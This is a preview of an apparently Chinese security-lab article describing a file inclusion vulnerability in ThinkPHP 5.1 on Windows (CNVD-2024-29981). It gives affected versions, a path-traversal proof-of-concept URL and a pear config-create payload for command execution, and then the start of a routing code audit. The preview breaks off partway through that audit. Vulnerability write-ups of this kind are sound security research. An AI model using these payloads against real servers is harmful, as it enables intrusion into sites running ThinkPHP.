专栏名称: 零组攻防实验室
零组攻防实验室,专注网络安全。
今天看啥  ›  专栏  ›  零组攻防实验室

Thinkphp5.1.0-Thinkphp5.1. 文件包含漏洞(CNVD-2024-29981)

零组攻防实验室  · 公众号  ·  · 2024-09-24 23:22

文章预览

声明 :请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 Thinkphp5.1.0-Thinkphp5.1.*文件包含漏洞 (CNVD-2024-29981)   time 4.24 测试版本:thinkphp 5.1.41 php: 7.3.4 影响范围:thinkphp5.1.0--thinkphp5.1.* (windows): linux无法利用 漏洞利用poc: index.php?s=..\..\你要包含的路径/index/index pear进行命令执行poc : /index.php?s=..\..\..\Extensions\php\php7.3.4nts\pear\ & +config-create+/+1.php 调用堆栈:     一.Thinkphp文件包含:   在Thinkphp5中路由可以使用一下两种方式都可以访问到执行的方法中如: http://127.0.0.1/index.php/index/index/hello http://127.0.0.1/index.php?s=index/index/hello 简单一点来说其实就是对应的 模块 /控制器/方法     1.1: Thinkphp5.1.41审计过程   首先需要触发路由 http://127.0.0.1/index.php?s=index/index/hello 进入run方法,     走到405行routeCheck方法,根 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览